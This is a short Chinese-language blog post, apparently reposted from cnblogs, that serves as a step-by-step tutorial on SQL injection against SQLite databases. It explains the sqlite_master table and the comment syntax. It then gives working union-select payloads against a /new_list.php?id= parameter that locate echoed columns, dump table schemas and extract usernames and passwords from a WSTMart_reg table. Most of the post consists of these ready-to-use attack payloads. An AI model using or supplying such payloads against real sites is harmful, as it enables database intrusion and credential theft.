码迷,mamicode.com
首页 > 数据库 > 详细

sqlite数据库注入

时间:2020-02-08 17:25:32      阅读:100      评论:0      收藏:0      [点我收藏+]

标签:list   空格   位置   php   注释   http   地址   sdn   type   

sqlite数据库大部分在开发时使用,其注入语句也与其他数据库不同

  1. sqlite数据库有一张sqlite_master表,里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息
  2. sqlite数据库的注释符是两个横杠“--”,空格会自动用加号表示
  3. 测试回显位置, /new_list.php?id=1 union select 1,2,3,4
  4. 开始爆这个表的字段值/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master
  5. 直接查/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg

附参考地址:https://blog.csdn.net/qq_39936434/article/details/94722615

sqlite数据库注入

标签:list   空格   位置   php   注释   http   地址   sdn   type   

原文地址:https://www.cnblogs.com/weak-chicken/p/12283925.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!